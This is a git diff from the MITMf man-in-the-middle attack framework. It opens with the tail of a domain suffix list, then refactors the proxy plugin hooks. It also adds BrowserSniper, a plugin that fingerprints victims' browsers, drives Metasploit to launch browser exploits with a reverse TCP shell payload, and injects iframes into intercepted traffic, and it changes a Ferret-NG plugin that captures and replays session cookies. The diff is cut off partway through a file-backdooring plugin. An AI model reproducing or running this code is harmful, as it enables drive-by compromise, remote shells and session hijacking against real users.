- -// va : http://en.wikipedia.org/wiki/.va -va - -// vc : http://en.wikipedia.org/wiki/.vc -// Submitted by registry 2008-06-13 -vc -com.vc -net.vc -org.vc -gov.vc -mil.vc -edu.vc - -// ve : http://registro.nic.ve/nicve/registro/index.html -*.ve - -// vg : http://en.wikipedia.org/wiki/.vg -vg - -// vi : http://www.nic.vi/newdomainform.htm -// http://www.nic.vi/Domain_Rules/body_domain_rules.html indicates some other -// TLDs are "reserved", such as edu.vi and gov.vi, but doesn't actually say they -// are available for registration (which they do not seem to be). -vi -co.vi -com.vi -k12.vi -net.vi -org.vi - -// vn : https://www.dot.vn/vnnic/vnnic/domainregistration.jsp -vn -com.vn -net.vn -org.vn -edu.vn -gov.vn -int.vn -ac.vn -biz.vn -info.vn -name.vn -pro.vn -health.vn - -// vu : http://en.wikipedia.org/wiki/.vu -// list of 2nd level tlds ? 
-vu - -// ws : http://en.wikipedia.org/wiki/.ws -// http://samoanic.ws/index.dhtml -ws -com.ws -net.ws -org.ws -gov.ws -edu.ws - -// IDN ccTLDs -// Please sort by ISO 3166 ccTLD, then punicode string -// when submitting patches and follow this format: -// ("" ) : -// [optional sponsoring org] -// - -// xn--mgbaam7a8h ("Emerat" Arabic) : AE -//http://nic.ae/english/arabicdomain/rules.jsp -امارات - -// xn--54b7fta0cc ("Bangla" Bangla) : BD -বাংলা - -// xn--fiqs8s ("China" Chinese-Han-Simplified <.Zhonggou>) : CN -// CNNIC -// http://cnnic.cn/html/Dir/2005/10/11/3218.htm -中国 - -// xn--fiqz9s ("China" Chinese-Han-Traditional <.Zhonggou>) : CN -// CNNIC -// http://cnnic.cn/html/Dir/2005/10/11/3218.htm -中國 - -// xn--lgbbat1ad8j ("Algeria / Al Jazair" Arabic) : DZ -الجزائر - -// xn--wgbh1c ("Egypt" Arabic .masr) : EG -// http://www.dotmasr.eg/ -مصر - -// xn--node ("ge" Georgian (Mkhedruli)) : GE -გე - -// xn--j6w193g ("Hong Kong" Chinese-Han) : HK -// https://www2.hkirc.hk/register/rules.jsp -香港 - -// xn--h2brj9c ("Bharat" Devanagari) : IN -// India -भारत - -// xn--mgbbh1a71e ("Bharat" Arabic) : IN -// India -بھارت - -// xn--fpcrj9c3d ("Bharat" Telugu) : IN -// India -భారత్ - -// xn--gecrj9c ("Bharat" Gujarati) : IN -// India -ભારત - -// xn--s9brj9c ("Bharat" Gurmukhi) : IN -// India -ਭਾਰਤ - -// xn--45brj9c ("Bharat" Bengali) : IN -// India -ভারত - -// xn--xkc2dl3a5ee0h ("India" Tamil) : IN -// India -இந்தியா - -// xn--mgba3a4f16a ("Iran" Persian) : IR -ایران - -// xn--mgba3a4fra ("Iran" Arabic) : IR -ايران - -//xn--mgbayh7gpa ("al-Ordon" Arabic) JO -//National Information Technology Center (NITC) -//Royal Scientific Society, Al-Jubeiha -الاردن - -// xn--3e0b707e ("Republic of Korea" Hangul) : KR -한국 - -// xn--fzc2c9e2c ("Lanka" Sinhalese-Sinhala) : LK -// http://nic.lk -ලංකා - -// xn--xkc2al3hye2a ("Ilangai" Tamil) : LK -// http://nic.lk -இலங்கை - -// xn--mgbc0a9azcg ("Morocco / al-Maghrib" Arabic) : MA -المغرب - -// xn--mgb9awbf ("Oman" Arabic) : OM -عمان - -// xn--ygbi2ammx ("Falasteen" Arabic) : PS -// The Palestinian National Internet Naming Authority (PNINA) -// http://www.pnina.ps -فلسطين - -// xn--90a3ac ("srb" Cyrillic) : RS -срб - -// xn--p1ai ("rf" Russian-Cyrillic) : RU -// http://www.cctld.ru/en/docs/rulesrf.php -рф - -// xn--wgbl6a ("Qatar" Arabic) : QA -// http://www.ict.gov.qa/ -قطر - -// xn--mgberp4a5d4ar ("AlSaudiah" Arabic) : SA -// http://www.nic.net.sa/ -السعودية - -// xn--mgberp4a5d4a87g ("AlSaudiah" Arabic) variant : SA -السعودیة - -// xn--mgbqly7c0a67fbc ("AlSaudiah" Arabic) variant : SA -السعودیۃ - -// xn--mgbqly7cvafr ("AlSaudiah" Arabic) variant : SA -السعوديه - -// xn--ogbpf8fl ("Syria" Arabic) : SY -سورية - -// xn--mgbtf8fl ("Syria" Arabic) variant : SY -سوريا - -// xn--yfro4i67o Singapore ("Singapore" Chinese-Han) : SG -新加坡 - -// xn--clchc0ea0b2g2a9gcd ("Singapore" Tamil) : SG -சிங்கப்பூர் - -// xn--o3cw4h ("Thai" Thai) : TH -// http://www.thnic.co.th -ไทย - -// xn--pgbs0dh ("Tunis") : TN -// http://nic.tn -تونس - -// xn--kpry57d ("Taiwan" Chinese-Han-Traditional) : TW -// http://www.twnic.net/english/dn/dn_07a.htm -台灣 - -// xn--kprw13d ("Taiwan" Chinese-Han-Simplified) : TW -// http://www.twnic.net/english/dn/dn_07a.htm -台湾 - -// xn--nnx388a ("Taiwan") variant : TW -臺灣 - -// xn--j1amh ("ukr" Cyrillic) : UA -укр - -// xn--mgb2ddes ("AlYemen" Arabic) : YE -اليمن - -// xxx : http://icmregistry.com -xxx - -// ye : http://www.y.net.ye/services/domain_name.htm -*.ye - -// yu : http://www.nic.yu/pravilnik-e.html -*.yu - -// za : http://www.zadna.org.za/slds.html -*.za - 
-// zm : http://en.wikipedia.org/wiki/.zm -*.zm - -// zw : http://en.wikipedia.org/wiki/.zw -*.zw diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index 9fe76cb..d9175a3 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -42,6 +42,10 @@ class ProxyPlugins: in handleResponse, but is still annoying. ''' _instance = None + + plist = [] + mthdDict = {"connectionMade": "clientRequest", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"} + pmthds = {} @staticmethod def getInstance(): @@ -50,13 +54,9 @@ class ProxyPlugins: return ProxyPlugins._instance - def setPlugins(self,plugins): + def setPlugins(self, plugins): '''Set the plugins in use''' - self.plist = [] - - #build a lookup list - #need to clean up in future - self.pmthds = {} + for p in plugins: self.addPlugin(p) @@ -66,17 +66,17 @@ class ProxyPlugins: '''Load a plugin''' self.plist.append(p) mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name)) - for mthd in p.implements: + for mthd,pmthd in self.mthdDict.iteritems(): try: - self.pmthds[mthd].append(getattr(p,mthd)) + self.pmthds[mthd].append(getattr(p,pmthd)) except KeyError: - self.pmthds[mthd] = [getattr(p,mthd)] + self.pmthds[mthd] = [getattr(p,pmthd)] def removePlugin(self,p): '''Unload a plugin''' self.plist.remove(p) mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name)) - for mthd in p.implements: + for mthd,pmthd in self.mthdDict.iteritems(): self.pmthds[mthd].remove(p) def hook(self): @@ -92,9 +92,15 @@ class ProxyPlugins: args[key] = values[key] #prevent self conflict - args['request'] = args['self'] + if (fname == "handleResponse") or (fname == "handleHeader") or (fname == "handleEndHeaders"): + args['request'] = args['self'] + args['response'] = args['self'].client + else: + args['request'] = args['self'] + del args['self'] + mitmf_logger.debug("[ProxyPlugins] hooking {}()".format(fname)) #calls any plugin that has this hook try: for f in self.pmthds[fname]: diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index df60e20..67b6dba 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -16,7 +16,13 @@ # USA # -import urlparse, logging, os, sys, random, re, dns.resolver +import urlparse +import logging +import os +import sys +import random +import re +import dns.resolver from twisted.web.http import Request from twisted.web.http import HTTPChannel @@ -33,7 +39,6 @@ from SSLServerConnection import SSLServerConnection from URLMonitor import URLMonitor from CookieCleaner import CookieCleaner from DnsCache import DnsCache -from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger('mitmf') @@ -52,7 +57,6 @@ class ClientRequest(Request): self.hsts = URLMonitor.getInstance().hsts self.cookieCleaner = CookieCleaner.getInstance() self.dnsCache = DnsCache.getInstance() - self.plugins = ProxyPlugins.getInstance() #self.uniqueId = random.randint(0, 10000) #Use are own DNS server instead of reactor.resolve() @@ -62,9 +66,6 @@ class ClientRequest(Request): def cleanHeaders(self): headers = self.getAllHeaders().copy() - #for k,v in headers.iteritems(): - # mitmf_logger.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v)) - if self.hsts: if 'referer' in headers: @@ -92,8 +93,6 @@ class ClientRequest(Request): if 'cache-control' in headers: del headers['cache-control'] - self.plugins.hook() - return headers def getPathFromUri(self): @@ -111,7 
+110,7 @@ class ClientRequest(Request): if os.path.exists(scriptPath): return scriptPath - mitmf_logger.warning("Error: Could not find lock.ico") + mitmf_logger.warning("[ClientRequest] Error: Could not find lock.ico") return "lock.ico" def handleHostResolvedSuccess(self, address): diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 4f3cb11..994e106 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -16,14 +16,16 @@ # USA # -import logging, re, string, random, zlib, gzip, StringIO, sys -import plugins - -try: - from user_agents import parse -except: - pass +import logging +import re +import string +import random +import zlib +import gzip +import StringIO +import sys +from user_agents import parse from twisted.web.http import HTTPClient from URLMonitor import URLMonitor from core.sergioproxy.ProxyPlugins import ProxyPlugins @@ -53,6 +55,7 @@ class ServerConnection(HTTPClient): self.postData = postData self.headers = headers self.client = client + self.printPostData = True self.clientInfo = None self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().hsts @@ -78,22 +81,17 @@ class ServerConnection(HTTPClient): mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host'])) mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri)) - self.plugins.hook() self.sendCommand(self.command, self.uri) def sendHeaders(self): for header, value in self.headers.iteritems(): - mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value)) + mitmf_logger.debug("[ServerConnection] Sending header: ({}: {})".format(header, value)) self.sendHeader(header, value) self.endHeaders() def sendPostData(self): - if 'clientprfl' in self.uri: - self.plugins.hook() - elif 'keylog' in self.uri: - self.plugins.hook() - else: + if self.printPostData is True: #So we can disable printing POST data coming from plugins try: postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging if len(postdata) > 0: @@ -101,8 +99,9 @@ class ServerConnection(HTTPClient): except UnicodeDecodeError and UnicodeEncodeError: mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host'])) pass - - self.transport.write(self.postData) + + self.printPostData = True + self.transport.write(self.postData) def connectionMade(self): mitmf_logger.debug("[ServerConnection] HTTP connection made.") @@ -118,8 +117,6 @@ class ServerConnection(HTTPClient): self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): - mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value)) - if (key.lower() == 'location'): value = self.replaceSecureLinks(value) if self.app: @@ -128,11 +125,11 @@ class ServerConnection(HTTPClient): if (key.lower() == 'content-type'): if (value.find('image') != -1): self.isImageRequest = True - mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...") + mitmf_logger.debug("[ServerConnection] Response is image content, not scanning") if (key.lower() == 'content-encoding'): if (value.find('gzip') != -1): - mitmf_logger.debug("[ServerConnection] Response is compressed...") + mitmf_logger.debug("[ServerConnection] Response is compressed") self.isCompressed = True elif (key.lower()== 'strict-transport-security'): @@ -147,15 +144,19 @@ class ServerConnection(HTTPClient): else: 
self.client.setHeader(key, value) + def handleEndHeaders(self): + if (self.isImageRequest and self.contentLength != None): + self.client.setHeader("Content-Length", self.contentLength) + + if self.length == 0: + self.shutdown() + self.plugins.hook() - def handleEndHeaders(self): - if (self.isImageRequest and self.contentLength != None): - self.client.setHeader("Content-Length", self.contentLength) + if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG": + for header, value in self.client.headers.iteritems(): + mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value)) - if self.length == 0: - self.shutdown() - def handleResponsePart(self, data): if (self.isImageRequest): self.client.write(data) @@ -175,15 +176,11 @@ class ServerConnection(HTTPClient): if (self.isCompressed): mitmf_logger.debug("[ServerConnection] Decompressing content...") data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() - - if len(data) < 1500: - mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data:\n{}".format(len(data), data)) - else: - mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) data = self.replaceSecureLinks(data) - res = self.plugins.hook() - data = res['data'] + data = self.plugins.hook()['data'] + + mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) if (self.contentLength != None): self.client.setHeader('Content-Length', len(data)) @@ -212,7 +209,7 @@ class ServerConnection(HTTPClient): for match in iterator: url = match.group() - mitmf_logger.debug("[ServerConnection] Found secure reference: " + url) + mitmf_logger.debug("[ServerConnection][HSTS] Found secure reference: " + url) nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl)) sustitucion[url] = nuevaurl diff --git a/core/utils.py b/core/utils.py index 059cc61..38845f0 100644 --- a/core/utils.py +++ b/core/utils.py @@ -30,51 +30,6 @@ from scapy.all import get_if_addr, get_if_hwaddr mitmf_logger = logging.getLogger('mitmf') -class ImportDir: - #--------------------------------------------------------------------------------------------------- - # http://gitlab.com/aurelien-lourot/importdir - #--------------------------------------------------------------------------------------------------- - - # File name of a module: - __module_file_regexp = "(.+)\.py(c?)$" - - #--------------------------------------------------------------------------------------------------- - # Interface - #--------------------------------------------------------------------------------------------------- - - def do(self, path, env): - """ Imports all modules residing directly in directory "path" into the provided environment - (usually the callers environment). A typical call: - importdir.do("example_dir", globals()) - """ - self.__do(path, env) - - - #--------------------------------------------------------------------------------------------------- - # Implementation - #--------------------------------------------------------------------------------------------------- - - def get_module_names_in_dir(self, path): - """ Returns a set of all module names residing directly in directory "path". 
- """ - result = set() - - # Looks for all python files in the directory (not recursively) and add their name to result: - for entry in os.listdir(path): - if os.path.isfile(os.path.join(path, entry)): - regexp_result = re.search(self.__module_file_regexp, entry) - if regexp_result: # is a module file name - result.add(regexp_result.groups()[0]) - - return result - - def __do(self, path, env): - """ Implements do(). - """ - sys.path.append(path) # adds provided directory to list we can import from - for module_name in sorted(self.get_module_names_in_dir(path)): # for each found module... - env[module_name] = __import__(module_name) # ... import - class SystemConfig: @staticmethod diff --git a/mitmf.py b/mitmf.py index df3ed01..6820952 100755 --- a/mitmf.py +++ b/mitmf.py @@ -83,7 +83,7 @@ try: sgroup.add_argument("--{}".format(p.optname), action="store_true",help="Load plugin {}".format(p.name)) if p.has_opts: - p.add_options(sgroup) + p.pluginOptions(sgroup) arg_dict[p.optname] = vars(sgroup)['_group_actions'] @@ -101,10 +101,10 @@ args = parser.parse_args() for plugin, options in arg_dict.iteritems(): if vars(args)[plugin] is False: for option in options: - if vars(args)[option.dest] is True: - sys.exit("[-] Called plugin options without invoking --{}".format(plugin)) + if vars(args)[option.dest]: + sys.exit("[-] Called plugin options without invoking the actual plugin (--{})".format(plugin)) -#first check to see if we supplied a valid interface +#check to see if we supplied a valid interface myip = SystemConfig.getIP(args.interface) mymac = SystemConfig.getMAC(args.interface) @@ -181,7 +181,7 @@ from core.dnschef.DNSchef import DNSChef DNSChef.getInstance().start() print "|_ DNSChef v{} online".format(DNSChef.version) -#start the SMB server +#Start the SMB server from core.protocols.smb.SMBserver import SMBserver print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver) SMBserver().start() diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py index 4b787b9..296522f 100644 --- a/plugins/AppCachePoison.py +++ b/plugins/AppCachePoison.py @@ -1,6 +1,6 @@ #!/usr/bin/env python2.7 -# Copyright (c) 2014-2016 Marcello Salvati +# Copyright (c) 2014-2016 Krzysztof Kotowicz, Marcello Salvati # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as @@ -18,8 +18,6 @@ # USA # -# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz - import logging import re import os.path @@ -33,10 +31,9 @@ from core.sslstrip.URLMonitor import URLMonitor mitmf_logger = logging.getLogger("mitmf") class AppCachePlugin(Plugin): - name = "App Cache Poison" + name = "AppCachePoison" optname = "appoison" desc = "Performs App Cache Poisoning attacks" - implements = ["handleResponse"] version = "0.3" has_opts = False @@ -47,7 +44,9 @@ class AppCachePlugin(Plugin): self.urlMonitor.setAppCachePoisoning() - def handleResponse(self, request, data): + def serverResponse(self, response, request, data): + + #This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future self.app_config = self.config['AppCachePoison'] # so we reload the config on each request url = request.client.uri @@ -60,22 +59,22 @@ class AppCachePlugin(Plugin): if "enable_only_in_useragents" in self.app_config: regexp = self.app_config["enable_only_in_useragents"] if regexp and not re.search(regexp,req_headers["user-agent"]): - mitmf_logger.info("%s Tampering disabled 
in this useragent (%s)" % (ip, req_headers["user-agent"])) - return {'request': request, 'data': data} + mitmf_logger.info("{} [{}] Tampering disabled in this useragent ({})".format(ip, self.name, req_headers["user-agent"])) + return {'response': response, 'request': request, 'data': data} urls = self.urlMonitor.getRedirectionSet(url) - mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls)) + mitmf_logger.debug("{} [{}] Got redirection set: {}".format(ip,self.name, urls)) (name,s,element,url) = self.getSectionForUrls(urls) if s is False: data = self.tryMassPoison(url, data, headers, req_headers, ip) - return {'request': request, 'data': data} + return {'response': response, 'request': request, 'data': data} - mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name)) + mitmf_logger.info("{} [{}] Found URL {} in section {}".format(ip, self.name, url, name)) p = self.getTemplatePrefix(s) if element == 'tamper': - mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p)) + mitmf_logger.info("{} [{}] Poisoning tamper URL with template {}".format(ip, self.name, p)) if os.path.exists(p + '.replace'): # replace whole content f = open(p + '.replace','r') data = self.decorate(f.read(), s) @@ -92,12 +91,12 @@ class AppCachePlugin(Plugin): data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip @@ -202,5 +201,3 @@ class AppCachePlugin(Plugin): return (name, section, 'raw',url) return (None, False,'',urls.copy().pop()) - - diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index e2ade2e..6104046 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -27,15 +27,15 @@ from core.beefapi import BeefAPI from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.Inject import Inject +from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class BeefAutorun(Inject, Plugin): +class BeefAutorun(Plugin): name = "BeEFAutorun" optname = "beefauto" desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" tree_output = [] - depends = ["Inject"] version = "0.3" has_opts = False diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py index 1b48b6a..53fc4e1 100644 --- a/plugins/BrowserProfiler.py +++ b/plugins/BrowserProfiler.py @@ -22,23 +22,25 @@ import logging from pprint import pformat from plugins.plugin import Plugin from plugins.Inject import Inject +from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class BrowserProfiler(Inject, Plugin): +class BrowserProfiler(Plugin): name = "Browser Profiler" optname = "browserprofiler" desc = "Attempts to enumerate all browser plugins of connected clients" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" + version = "0.3" has_opts = False def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.get_payload() self.dic_output = {} # so other plugins can access the results - + + inject = Inject() + inject.initialize(options) + inject.html_payload = self.get_payload() + ProxyPlugins.getInstance().addPlugin(inject) + def post2dict(self, post): #converts the ajax post to a dic dict = {} for line in post.split('&'): @@ -46,25 +48,29 @@ class BrowserProfiler(Inject, Plugin): dict[t[0]] = t[1] return dict - def sendPostData(self, request): + def 
clientRequest(self, request): #Handle the plugin output if 'clientprfl' in request.uri: + request.printPostData = False + self.dic_output = self.post2dict(request.postData) self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client if self.dic_output['plugin_list'] > 0: self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') pretty_output = pformat(self.dic_output) - mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) + mitmf_logger.info("{} [{}] Got data:\n{}".format(request.client.getClientIP(), self.name, pretty_output)) def get_payload(self): payload = """""" - - return payload + plugindetect = open("./core/javascript/plugindetect.js", 'r').read() + return '' diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py new file mode 100644 index 0000000..0d356a8 --- /dev/null +++ b/plugins/BrowserSniper.py @@ -0,0 +1,222 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import string +import random +import sys +import logging + +from time import sleep +from core.msfrpc import Msfrpc +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.BrowserProfiler import BrowserProfiler + +mitmf_logger = logging.getLogger("mitmf") + +class BrowserSniper(BrowserProfiler, Plugin): + name = "BrowserSniper" + optname = "browsersniper" + desc = "Performs drive-by attacks on clients with out-of-date browser plugins" + version = "0.4" + has_opts = False + + def initialize(self, options): + self.options = options + self.msfip = SystemConfig.getIP(options.interface) + self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit + + msfcfg = self.config['MITMf']['Metasploit'] + self.rpcip = msfcfg['rpcip'] + self.rpcpass = msfcfg['rpcpass'] + + #Initialize the BrowserProfiler plugin + BrowserProfiler.initialize(self, options) + + try: + self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary + self.msf.login('msf', self.rpcpass) + version = self.msf.call('core.version')['version'] + self.tree_info.append("Connected to Metasploit v{}".format(version)) + except Exception: + sys.exit("[-] Error connecting to MSF! 
Make sure you started Metasploit and it's MSGRPC server") + + def startThread(self, options): + self.snipe() + + def onConfigChange(self): + self.initialize(self.options) + + def _genRandURL(self): #generates a random url for our exploits (urls are generated with a / at the beginning) + return "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5)) + + def _getRandPort(self): + return random.randint(1000, 65535) + + def _setupExploit(self, exploit, msfport): + + rand_url = self._genRandURL() + rand_port = self._getRandPort() + #generate the command string to send to the virtual console + #new line character very important as it simulates a user pressing enter + cmd = "use exploit/{}\n".format(exploit) + cmd += "set SRVPORT {}\n".format(msfport) + cmd += "set URIPATH {}\n".format(rand_url) + cmd += "set PAYLOAD generic/shell_reverse_tcp\n" + cmd += "set LHOST {}\n".format(self.msfip) + cmd += "set LPORT {}\n".format(rand_port) + cmd += "set ExitOnSession False\n" + cmd += "exploit -j\n" + + #Create a virtual console + console_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [console_id, cmd]) + + return (rand_url, rand_port) + + def _compat_system(self, os_config, brw_config): + os = self.output['useragent'][0].lower() + browser = self.output['useragent'][1].lower() + + if (os_config == 'any') and (brw_config == 'any'): + return True + + if (os_config == 'any') and (brw_config in browser): + return True + + if (os_config in os) and (brw_config == 'any'): + return True + + if (os_config in os) and (brw_config in browser): + return True + + return False + + def getExploits(self): + exploits = list() + vic_ip = self.output['ip'] + + #First get the client's info + java = None + if (self.output['java_installed'] == '1') and (self.output['java_version'] != 'null'): + java = self.output['java_version'] + + flash = None + if (self.output['flash_installed'] == '1') and (self.output['flash_version'] != 'null'): + flash = self.output['flash_version'] + + mitmf_logger.debug("{} [BrowserSniper] Java installed: {} | Flash installed: {}".format(vic_ip, java, flash)) + + for exploit, details in self.config['BrowserSniper'].iteritems(): + + if self._compat_system(details['OS'].lower(), details['Browser'].lower()): + + if details['Type'].lower() == 'browservuln': + exploits.append(exploit) + + elif details['Type'].lower() == 'pluginvuln': + + if details['Plugin'].lower() == 'java': + if (java is not None) and (java in details['PluginVersions']): + exploits.append(exploit) + + elif details['Plugin'].lower() == 'flash': + + if (flash is not None) and (java in details['PluginVersions']): + exploits.append(exploit) + + mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits)) + return exploits + + def injectAndPoll(self, ip, inject_payload): #here we inject an iframe to trigger the exploit and check for resulting sessions + + #inject iframe + mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip)) + self.html_payload = inject_payload #temporarily changes the code that the Browserprofiler plugin injects + + #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds + #Will also make sure the shell actually came from the box that we targeted + #probably a much cleaner way of doing this :/ + mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip)) + exit_loop = False + 
poll_n = 1 + while poll_n <= 30: + + if exit_loop is True: + break + + sessions = self.msf.call('session.list') + if sessions: + for k, v in sessions.iteritems(): + if ip in sessions[k]['tunnel_peer']: + mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip)) + self.sploited_ips.append(ip) + self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped + exit_loop = True + break + + poll_n += 1 + sleep(2) + + if exit_loop is False: #We didn't get a shell :( + mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip)) + + self.html_payload = self.get_payload() # restart the BrowserProfiler plugin + + def snipe(self): + while True: + if self.output: + vic_ip = self.output['ip'] + msfport = self.config['MITMf']['Metasploit']['msfport'] + exploits = self.getExploits() + + if not exploits: + if vic_ip not in self.sploited_ips: + mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip)) + self.sploited_ips.append(vic_ip) + self.black_ips = self.sploited_ips + + elif exploits and (vic_ip not in self.sploited_ips): + mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits))) + + inject_payload = '' + + for exploit in exploits: + + jobs = self.msf.call('job.list') #get running jobs + if jobs: + for pid, name in jobs.iteritems(): + info = self.msf.call('job.info', [pid]) + if (exploit in info['name']): + mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit)) + url = info['uripath'] #get the url assigned to the exploit + inject_payload += "".format(self.msfip, msfport, url) + else: + url, port = self._setupExploit(exploit, msfport) + inject_payload += "".format(self.msfip, port, url) + else: + url, port = self._setupExploit(exploit, msfport) + inject_payload += "".format(self.msfip, port, url) + + self.injectAndPoll(vic_ip, inject_payload) + + sleep(1) diff --git a/plugins/FerretNG.py b/plugins/FerretNG.py index 9512e62..612dcbf 100644 --- a/plugins/FerretNG.py +++ b/plugins/FerretNG.py @@ -20,20 +20,20 @@ import logging +from datetime import datetime from plugins.plugin import Plugin from twisted.internet import reactor from twisted.web import http from twisted.internet import reactor -from core.ferretNG.FerretProxy import FerretProxy -from core.ferretNG.URLMonitor import URLMonitor +from core.ferretng.FerretProxy import FerretProxy +from core.ferretng.URLMonitor import URLMonitor mitmf_logger = logging.getLogger("mitmf") class FerretNG(Plugin): name = "Ferret-NG" - optname = "ferret" + optname = "ferretng" desc = "Captures cookies and starts a proxy that will feed them to connected clients" - tree_output = list() version = "0.1" has_opts = True @@ -42,14 +42,16 @@ class FerretNG(Plugin): self.options = options self.ferret_port = 10010 or options.ferret_port - self.tree_output.append("Listening on port {}".format(self.ferret_port)) + self.tree_info.append("Listening on port {}".format(self.ferret_port)) def clientRequest(self, request): if 'cookie' in request.headers: host = request.headers['host'] cookie = request.headers['cookie'] - mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(request.client.getClientIP(), host, cookie)) - URLMonitor.getInstance().cookies[host] = cookie + client = request.client.getClientIP() + if host not in URLMonitor.getInstance().cookies: + mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie)) + 
URLMonitor.getInstance().cookies[client] = {'host': host, 'cookie': cookie} def pluginReactor(self, StrippingProxy): FerretFactory = http.HTTPFactory(timeout=10) @@ -57,4 +59,11 @@ class FerretNG(Plugin): reactor.listenTCP(self.ferret_port, FerretFactory) def pluginOptions(self, options): - options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG on (default 10010)') + options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)') + options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from log file') + + def finish(self): + mitmf_logger.info("[Ferret-NG] Writing cookies to log file") + with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s"))) as cookie_file: + cookie_file.write(URLMonitor.getInstance().cookies) + cookie_file.close() \ No newline at end of file diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 54bf08a..54ccad6 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -61,6 +61,7 @@ import logging import shutil import random import string +import threading import tarfile import multiprocessing @@ -78,8 +79,7 @@ 